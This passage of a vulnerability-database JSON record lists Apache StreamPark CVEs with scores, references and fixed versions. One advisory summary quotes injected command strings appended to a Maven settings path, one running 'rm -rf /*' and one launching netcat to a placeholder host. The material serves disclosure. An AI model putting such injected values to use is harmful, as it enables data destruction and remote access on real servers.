detail/CVE-2023-30867"},{"reference_url":"https://github.com/advisories/GHSA-rrcg-jwr5-32g7","reference_id":"GHSA-rrcg-jwr5-32g7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rrcg-jwr5-32g7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67020?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.2","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.2"},{"url":"http://public2.vulnerablecode.io/api/packages/69604?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-8bjy-8jm9-2bhu"},{"vulnerability":"VCID-9ssf-rvpt-suce"},{"vulnerability":"VCID-vpe1-chyd-q7cu"},{"vulnerability":"VCID-ztkm-usgz-hkdx"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.5"}],"aliases":["CVE-2023-30867","GHSA-rrcg-jwr5-32g7"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pxce-7c8m-euce"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19092?format=json","vulnerability_id":"VCID-r8gn-a5tn-7bbq","summary":"Improper Neutralization of Special Elements used in a Command ('Command Injection')\nIn streampark, there is a project module that integrates Maven's compilation capability. However, there is no check on the compilation parameters of Maven. allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.\n\nMitigation:\n\nall users should upgrade to 2.1.2\n\nExample:\n\n##You can customize the splicing method according to the compilation situation of the project, mvn compilation results use &&, compilation failure use \"||\" or \"&&\":\n\n/usr/share/java/maven-3/conf/settings.xml || rm -rf /*\n\n/usr/share/java/maven-3/conf/settings.xml && nohup nc x.x.x.x 8899 &","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-49898","reference_id":"","reference_type":"","scores":[{"value":"0.01896","scoring_system":"epss","scoring_elements":"0.83534","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-49898"},{"reference_url":"https://github.com/apache/incubator-streampark","reference_id":"","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apache/incubator-streampark"},{"reference_url":"https://lists.apache.org/thread/qj99c03r4td35f8gbxq084b8qmv2fyr3","reference_id":"","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://lists.apache.org/thread/qj99c03r4td35f8gbxq084b8qmv2fyr3"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-49898","reference_id":"CVE-2023-49898","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-49898"},{"reference_url":"https://github.com/advisories/GHSA-qg44-xqwj-wc28","reference_id":"GHSA-qg44-xqwj-wc28","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-qg44-xqwj-wc28"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/67020?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.2","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.2"},{"url":"http://public2.vulnerablecode.io/api/packages/69604?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-8bjy-8jm9-2bhu"},{"vulnerability":"VCID-9ssf-rvpt-suce"},{"vulnerability":"VCID-vpe1-chyd-q7cu"},{"vulnerability":"VCID-ztkm-usgz-hkdx"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.5"}],"aliases":["CVE-2023-49898","GHSA-qg44-xqwj-wc28"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-r8gn-a5tn-7bbq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/236448?format=json","vulnerability_id":"VCID-t8ws-6etb-ayhf","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-52291","reference_id":"","reference_type":"","scores":[{"value":"0.00397","scoring_system":"epss","scoring_elements":"0.60849","published_at":"2026-05-30T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-52291"},{"reference_url":"https://github.com/apache/streampark","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/apache/streampark"},{"reference_url":"https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-07-22T15:31:24Z/"}],"url":"https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf"},{"reference_url":"http://www.openwall.com/lists/oss-security/2024/07/17/1","reference_id":"","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-07-22T15:31:24Z/"}],"url":"http://www.openwall.com/lists/oss-security/2024/07/17/1"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-52291","reference_id":"CVE-2023-52291","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-52291"},{"reference_url":"https://github.com/advisories/GHSA-7g94-hfqc-q993","reference_id":"GHSA-7g94-hfqc-q993","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7g94-hfqc-q993"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/82188?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.4"},{"url":"http://public2.vulnerablecode.io/api/packages/69604?format=json","purl":"pkg:maven/org.apache.streampark/streampark@2.1.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-8bjy-8jm9-2bhu"},{"vulnerability":"VCID-9ssf-rvpt-suce"},{"vulnerability":"VCID-vpe1-chyd-q7cu"},{"vulnerability":"VCID-ztkm-usgz-hkdx"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.5"}],"aliases":["CVE-2023-52291","GHSA-7g94-hfqc-q993"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"7.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-t8ws-6etb-ayhf"}],"risk_score":"4.0","resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.streampark/streampark@2.1.5"}